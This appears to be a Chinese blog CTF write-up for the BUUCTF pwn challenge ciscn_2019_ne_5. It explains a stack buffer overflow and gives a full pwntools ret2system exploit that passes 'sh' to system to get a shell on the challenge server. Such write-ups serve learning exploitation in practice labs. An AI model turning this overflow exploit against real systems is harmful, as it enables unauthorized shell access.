BUUCTF-ciscn_2019_ne_51

最新推荐文章于 2025-03-20 16:34:12 发布
最新推荐文章于 2025-03-20 16:34:12 发布
阅读量360 收藏 1
点赞数
分类专栏: BUUCTF 文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/arraylocalhost/article/details/127217915
版权

0x1 checksec

 根据文件名可知是other shellcode

0x2 IDA

1.main函数

s1只有48,但是scanf读入100,存在溢出点

2.GetFlag函数 

flag就是我们的log

读程序流程

 

case 1,添加一个log,然后case 4去get flag

程序存在system函数

调用bin/sh  去getshell

但是该题有一个小点

用ROPgadget搜不到'/bin/sh' 字符串

'/sh'    'sh'     

system的参数不一定必须是“/bin/sh”,单独的“sh”也可以拿到shell

 

0x3 EXP

from pwn import*

r=remote("node4.buuoj.cn",29072)
elf=ELF('20ciscn2019ne5')
system_addr=elf.sym['system']
shell_addr=0x80482ea

r.recvuntil('Please input admin password:')
r.sendline('administrator')

r.recvuntil('0.Exit\n:')
r.sendline('1')

payload='a'*(0x48+4)+p32(system_addr)+'1234'+p32(shell_addr)

r.recvuntil('Please input new log info:')
r.sendline(payload)

r.recvuntil('0.Exit\n:')
r.sendline('4')

r.interactive()

BUUCTFciscn_2019_n_1 1
qq_41560595的博客
09-24 4705
这道题是栈溢出题型,又不同于一般的栈溢出,在此做个总结。 查看权限 拖入IDA,F5可用函数 解题思路:这道题的意思是输入字符串v1,判断v2。考虑输入长字符串覆盖到存储v2的内存空间,把v2的值改掉。 因此,覆盖0x30-0x4=44个字节给v1,另外4个字节给v2 由于v2数值在内存中以16进制存储,所以,找到11.28125的16进制值。 存在两个比较指令,双击进去。 0x41348000就是16进制的11.28125。 编写脚本 from pwn import * p=remote('
[BUUCTF]-PWN:ciscn_2019_n_3解析
2301_79326813的博客
01-20 917
堆题,先看保护32位,Partial RELRO,没pie关键信息就那么多,看ida大致就是alloc创建堆块,free释放堆块,dump打印堆块内容但是仔细看这三个函数就可以发现在实际运行中,会先创建一个存有free相关函数的地址和打印堆块内容相关函数的地址。看delete函数并结合动态调试,可以知道释放堆块的过程实际上是调用先创造的12字节堆块的rec_str_free。那也就意味着无论那块地址存的是哪里的地址,我们在free堆块时他都会执行,并且题目给了我们system。
BUUCTF-ciscn_2019_n_51
Rt1Text的博客
10-09 425
没有开启保护,有可写segments,考虑shellcode。
BUU CTF ciscn_2019_n_1
最新发布
A_fish_like_sing的博客
03-20 1954
新手向对BUU CTF ciscn_2019_n_1该题的两种解法
[BUUCTF]PWN5——ciscn_2019_n_1
mcmuyanga的博客
08-25 2204
[BUUCTF]4——ciscn_2019_n_1 题目网址:https://buuoj.cn/challenges#ciscn_2019_n_1 步骤: 例行检查,64位,开启了nx保护 nc一下看看输入点的字符串,看运行结果猜测是一个猜数的程序,而且需要我们猜的数应该是11.28125 输入11.28125,发现还是不对 用64位ida打开,首先shift+f12查看程序里的字符串,发现了 “ cat /flag ” 双击跟进,ctrl+x找到调用这个字符串的函数 我们可以看到第10行的if
buuctf ciscn_2019_n_5
qq_53912227的博客
02-15 213
发现有个name的全局变量(bss),这个时候就想到用ret2shellcode,但是实际上是不行的,因为这个name的bss不具有x权限。shift+f12发现没有system和binsh等字符串,因此就需要用到ret2libc,这里的puts正好提前被使用了。发现NX unknown(想到了ret2shellcode)这个时候就可以确定ret2shellcode不行。开局:典型的ret2libc,老规矩,file 文件。
BUUCTF ciscn_2019_n_5
2401_88087539的博客
01-14 371
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
免积分Intel-NUC-ne1000_0.8.4-3vmw.670.0.0.8169922-offline_bundle
03-24
标题中的“免积分Intel-NUC-ne1000_0.8.4-3vmw.670.0.0.8169922-offline_bundle”指的是一个针对Intel NUC(Next Unit of Computing)设备的特定网络控制器驱动程序,此版本为0.8.4,并且是专为VMware ESXi虚拟化...
ciscn_2019_ne_5
m0_52231248的博客
11-15 380
ciscn_2019_ne_5 Checksec: Ida: 首先会让我们输入密码,密码正确就会进入一个switch循环 我们看到循环中case4是调用catflag函数,跟进查看 Catflag函数中存在strcpy(dest,src)dest(offest)=0x44+4,只要我们能控制src就会存在溢出 再次回到main我们发现case1调用的addlog可以让我们输入src 于是思路就很清楚了先case1调用addlog输入我们的payload再case4将pa
Intel-NUC-ne1000_0.8.4-3vmw.670.0.0.8169922-offline_bundle-16654787.zip
12-08
Intel NUC上的ne1000网卡驱动,主要针对一些家用主板上的I219V网卡在ESXi上的驱动. 两种办法利用这个驱动,1.利用ESXi打包工具直接把驱动打包进入安装包里, 2.如果还有别的网卡,可以先把ESXi安装上去之后,再通过...
110m_physical_地图_ne_110m_graticules_世界地图_physical_
09-28
标题中的“110m_physical_地图_ne_110m_graticules_世界地图_physical_”揭示了这个压缩包包含的是一个详细的世界地形地图,比例尺为110米,专用于展示地球的物理特征。"Physical"通常指的是地理特征,如山脉、河流...
BUUCTF 刷题 ciscn_2019_n_5
Helloity的博客
02-09 3293
先附上题目:BUUCTF在线评测 放到我们的虚拟机上checksec一下,64位程序,拥有RWX段。 Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments 接下来放到IDA里f5一下,可以看到主函数读
BUUCTF ciscn_2019_n_1 1
qq_56313338的博客
09-10 371
可以通过溢出v2来覆盖v1的值从而获取flag首先v1是浮点数11.28125的二进制是0x413480。
BUUCTF ciscn_2019_n_1
RookieMOR的博客
05-14 734
1.下载文件,用checksec一下: 2.用IDA64查看,进入func函数: 当v2=11.28125时获得flag,但只有v1的输入,没有v2输入。因为有一个gets函数,点击v1,v2可以知道,v1与v2差44个字节,可以通过输入v1的值去改变v2的值,实现栈溢出。 查看汇编可以看到有一个uconiss的比较指令,把xmm0与cs:dword_4007F4,由movss可以知道xmme0是v1或v2的值,那么点击dword_4007F4 看到一个 dd ,百度一下可以知道,.
[每日一PWN]BUUCTF ciscn_2019_n_1
qq_55233040的博客
11-21 629
这道题双解,一种ret2text,另一种就是单纯的覆盖数据改变判断结果。
[BUUCTF-pwn]——ciscn_2019_n_1
Y_peak的博客
01-31 1263
[BUUCTF-pwn]——ciscn_2019_n_1 [BUUCTF-pwn]——ciscn_2019_n_1思路一 —— 覆盖局部变量思路二 —— 覆盖返回地址 题目地址:https://buuoj.cn/challenges#ciscn_2019_n_1 题目: 老规矩下载下来后,在Linux上checksec一下,64位,并且没有开启栈保护,意味着我们可以利用栈溢出 在IDA中看一下,main函数里面没有什么可以利用的 双击func函数看看,就是我们想要的。 思路一 —— 覆盖局部变量
BUUCTFciscn_2019_n_5 Write Up
古月浪子的博客
08-06 556
这个反编译有点不准确,不过大概意思能理解到,先读入0x64字符到bss段上,然后用gets函数读入到栈上 什么保护都没开,我们发现可以直接执行bss段上的代码 思路很简单,将shellcode写入bss段,然后栈溢出rop到bss段上执行shellcode,拿到shell 注意栈帧大小 from pwn import * from LibcSearcher import * from struct import pack context.os='linux' context.arch='amd64'.
BUUCTF Pwn ciscn_2019_n_1 1
qq_45200829的博客
11-08 447
BUUCTF Pwn类型 ciscn_2019_n_1 1 解题过程
BUUCTF ciscn_2019_es_1
doudoudedi
01-04 964
我本地直接用fastbin attack直接能打通但是远程似乎有问题 思路 首先申请一个smallbin大小的trunk然后释放打印得到libc基址,然后double free打fastbin attack之后写到libc去__malloc_hook写入one_gadget再次add获取shell 以下为ubuntu16的环境下本地也就是libc-2.23 exp: #!/usr/bin/pyth...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值